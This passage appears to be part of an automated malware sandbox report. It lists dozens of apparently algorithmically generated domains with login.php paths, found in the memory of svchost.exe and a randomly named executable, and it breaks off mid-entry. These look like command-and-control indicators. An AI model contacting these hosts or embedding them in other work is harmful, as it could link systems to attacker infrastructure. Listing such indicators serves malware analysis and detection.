Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332264267.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofymem.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184899677.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2207439218.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197653218.0000000009298000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202867008.0000000009299000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://vofymik.com/login.php
Source: svchost.exe, 00000002.00000003.2667584330.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofypam.com/http://pujycyp.com/http://volydyk.com/http://pujycyp.com/http://qetyrul.com/http:
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofypam.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofypuf.com/login.php
Source: svchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363891080.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2809409371.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2814428917.00000000040FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyqek.com/login.php
Source: svchost.exe, 00000002.00000003.2667584330.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyzof.com/http://vofypam.com/http://vofypam.com/http://pumymap.com/http://qetyrul.com/http:
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyzof.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3418889094.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3278908147.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3428117276.00000000092CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyzyc.com/login.php
Source: svchost.exe, 00000002.00000003.2498726255.000000000085D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310938686.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309738735.00000000092BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyzym.com/
Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322419492.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527939785.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2523187509.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2512099666.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2314873415.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322755404.00000000092B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyzym.com/login.php
Source: svchost.exe, 00000002.00000003.2289346650.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2287542216.0000000003330000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2292259372.0000000003332000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2496966130.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2289345179.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2297411828.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojybek.com/login.php
Source: svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojybim.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycec.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3413784840.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3428117276.00000000092CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycit.com/login.php
Source: svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyduf.com/0
Source: svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyduf.com/P
Source: svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyduf.com/h
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyduf.com/login.php
Source: svchost.exe, 00000002.00000003.2344956997.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2345061243.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344054756.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojygok.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojygym.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377025491.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojymuk.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojypat.com/login.php
Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojypuc.com/login.php
Source: svchost.exe, 00000002.00000003.2344956997.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330643505.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332264267.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344054756.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyquf.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361263640.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361214474.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyzik.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388806823.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volybak.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2512566471.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2530302930.00000000092C9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volydot.com/login.php
Source: svchost.exe, 00000002.00000003.2667584330.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2694181112.00000000040F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volydyk.com/H
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2653309169.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volydyk.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygoc.com/
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347178577.0000000003322000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349507832.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349422845.000000000332C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347613705.0000000003325000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygoc.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376002854.000000000923B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjif.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344112591.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635305989.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjym.com/login.php
Source: svchost.exe, 00000002.00000003.2178059519.000000000923A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197653218.0000000009298000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202867008.0000000009299000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.0000000000802000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.000000000154E000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2875818807.00000000091FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://volykyc.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2639286842.000000000086C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volymaf.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361263640.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypof.com/login.php
Source: svchost.exe, 00000002.00000003.2853017937.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyqam.com/
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2649196751.00000000091F7000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D47000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 